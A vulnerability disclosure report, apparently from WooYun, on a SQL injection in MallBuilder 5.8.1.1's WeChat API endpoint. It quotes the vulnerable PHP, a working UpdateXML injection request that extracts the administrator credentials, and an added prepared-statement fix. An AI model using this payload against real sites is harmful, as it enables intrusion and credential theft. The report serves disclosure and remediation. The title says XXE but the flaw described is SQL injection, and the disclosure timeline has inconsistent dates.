Vulnerability summary

Defect ID: wooyun-2014-081144

Title: mallbuilder multi-user mall system XXE injection can dump the administrator username and password

Vendor: shop-builder.cn

Author: nextdoor

Submitted: 2014-10-29 12:52

Fix time: 2014-12-30 14:44

Published: 2014-12-30 14:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor has been notified but ignored the vulnerability

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-10-29: Details sent to the vendor, awaiting vendor response
2014-11-03: Vendor chose to ignore the vulnerability; details opened to third-party security partners
2014-12-28: Details disclosed to core white hats and domain experts
2015-01-07: Details disclosed to regular white hats
2015-01-17: Details disclosed to intern white hats
2014-12-30: Details disclosed to the public

Brief description:

XXE injection in the mallbuilder multi-user mall system

Detailed description:

System: MallBuilder_v5.8.1.1
In api/wechat.php:

<?php
include_once("../includes/global.php");
@include_once("../config/wechat_config.php");
$wechat = $wechat_config['wechat'] ? $wechat_config['wechat'] : "";
define("TOKEN", $wechat);
$wechatObj = new wechatCallbackapiTest();
if ($_GET["echostr"] && $_GET["signature"] && $_GET["timestamp"] && $_GET["nonce"])
// if these GET parameters are absent, execution falls through to the else branch
{
    $wechatObj->valid();
}
else
{
    $wechatObj->responseMsg(); // follow responseMsg()
}
class wechatCallbackapiTest
{
    public function valid()
    {
        $echoStr = $_GET["echostr"];
        if ($this->checkSignature()) {
            echo $echoStr;
            exit;
        }
    }
    public function responseMsg()
    {
        $postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
        global $db, $config;
        if (!empty($postStr)) {

            $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);

            $fromUsername = $postObj->FromUserName;
            $toUsername = $postObj->ToUserName;
            $keyword = trim($postObj->Content);
            $time = time();
            $RX_TYPE = trim($postObj->MsgType);
            $num = 0;

            $str = "";

            if ($RX_TYPE == 'text') // the POSTed MsgType is text
            {

                if (!empty($keyword)) // Content is taken from the XML body
                {

                    $sql = "select pname,id,pic from " . PRO . " where pname like '%$keyword%' order by id desc limit 0,4"; // Content goes straight into the SQL statement, so it is injectable
                    $db->query($sql);
                    $re = $db->getRows();
                    foreach ($re as $val)
                    {
                        $str .= "<item>
<Title><![CDATA[" . $val['pname'] . "]]></Title>
<Description><![CDATA[]]></Description>
<PicUrl><![CDATA[" . $val['pic'] . "]]></PicUrl>
<Url><![CDATA[" . $config['weburl'] . "?m=product&s=detail&id=" . $val['id'] . "]]></Url>
</item>";
                        $num++;
                        echo "test2";
                    }
                    if ($num > 0)
                    {
                        $textTpl = "<xml>
<ToUserName><![CDATA[%s]]></ToUserName>
<FromUserName><![CDATA[%s]]></FromUserName>
<CreateTime>%s</CreateTime>
<MsgType><![CDATA[news]]></MsgType>
<ArticleCount>" . $num . "</ArticleCount>
<Articles>" . $str . "</Articles>
<FuncFlag>1</FuncFlag>
</xml>";
                        $msgType = "text";
                        $contentStr = "";
                        $resultStr = sprintf($textTpl, $fromUsername, $toUsername, $time, $msgType, $contentStr);
                        echo $resultStr;

                    }
                }
                else
                    echo "Input something1 ";
            }
            else {
                echo "Input something2 ";
            }
        } else {
            echo "";
            echo "test6";
            exit;
        }
    }
    private function checkSignature()
    {
        $signature = $_GET["signature"];
        $timestamp = $_GET["timestamp"];
        $nonce = $_GET["nonce"];

        $token = TOKEN;
        $tmpArr = array($token, $timestamp, $nonce);
        sort($tmpArr);
        $tmpStr = implode($tmpArr);
        $tmpStr = sha1($tmpStr);

        if ($tmpStr == $signature) {
            return true;
        } else {
            return false;
        }
    }
}
?>
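A hardened version of the vulnerable path, added here as an example and not part of the original report or of MallBuilder's code: the keyword is bound through a prepared statement instead of being interpolated, and the POST branch now runs the signature check that the original only applies to the GET echostr handshake. It assumes a mysqli connection ($mysqli, with the mysqlnd driver for get_result()) and the PRO table-name constant from the original file; verifyWechatSignature, searchProductsByKeyword and handleWechatPost are names chosen for this example.

```php
<?php
// Added example, not MallBuilder's own code. Two fixes for the responseMsg() path:
// bind the keyword instead of interpolating it, and require the signature check on
// POST, which the original skips. Assumes $mysqli (mysqli + mysqlnd) and constant PRO.

function verifyWechatSignature(string $token, string $signature, string $timestamp, string $nonce): bool
{
    // Same scheme as the original checkSignature(): sort, concatenate, sha1.
    $parts = [$token, $timestamp, $nonce];
    sort($parts, SORT_STRING);
    $expected = sha1(implode('', $parts));
    // hash_equals replaces the loose == comparison used in the original.
    return hash_equals($expected, $signature);
}

function searchProductsByKeyword(mysqli $mysqli, string $keyword): array
{
    // Escape LIKE metacharacters so the caller cannot widen the pattern; the value
    // itself is bound, so quotes and comment markers in it never reach the SQL parser.
    $pattern = '%' . addcslashes($keyword, '%_\\') . '%';

    // PRO is the table-name constant from the original file, not user input.
    $stmt = $mysqli->prepare(
        'SELECT pname, id, pic FROM ' . PRO . ' WHERE pname LIKE ? ORDER BY id DESC LIMIT 4'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $mysqli->error);
    }
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC); // get_result() needs mysqlnd
    $stmt->close();
    return $rows;
}

// Hardened entry point: the POST branch checks the signature before parsing the body.
function handleWechatPost(mysqli $mysqli, string $rawBody): array
{
    if (!verifyWechatSignature(TOKEN, $_GET['signature'] ?? '', $_GET['timestamp'] ?? '', $_GET['nonce'] ?? '')) {
        http_response_code(403);
        return [];
    }
    // LIBXML_NONET stops the parser from fetching network resources for the untrusted body.
    $postObj = simplexml_load_string($rawBody, 'SimpleXMLElement', LIBXML_NOCDATA | LIBXML_NONET);
    if ($postObj === false || trim((string) $postObj->MsgType) !== 'text') {
        return [];
    }
    $keyword = trim((string) $postObj->Content);
    return $keyword === '' ? [] : searchProductsByKeyword($mysqli, $keyword);
}
```

With the keyword bound as a parameter, the Content value from the request below is matched literally as product-name text rather than executed.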


The POST request submitted:

POST /mallbuilder/api/wechat.php HTTP/1.1
Host: 127.0.0.1:8088
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=fdb687e31fb1d9a23b1b5dc3221123f9
<xml>
<ToUserName>test1</ToUserName>
<FromUserName>test3</FromUserName>
<CreateTime>123456</CreateTime>
<MsgType>text</MsgType>
<ArticleCount>11</ArticleCount>
<Articles>aaa</Articles>
<FuncFlag>0</FuncFlag>
<Content>test' and UpdateXML(1,CONCAT(0x5b,mid((SELECT (select concat(user,0x23,password) from mallbuilder_admin limit 1)),1,32),0x5d),1)#</Content>
</xml>

Proof of vulnerability:

[Screenshot: mall1.PNG]

[Screenshot: mall2.PNG]


Demo on the vendor's official site:

[Screenshot: mall3.PNG]

Fix recommendation:

Copyright notice: when reposting, please credit the source nextdoor@WooYun


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored on: 2014-12-30 14:44

Vendor reply:

Latest status:

None yet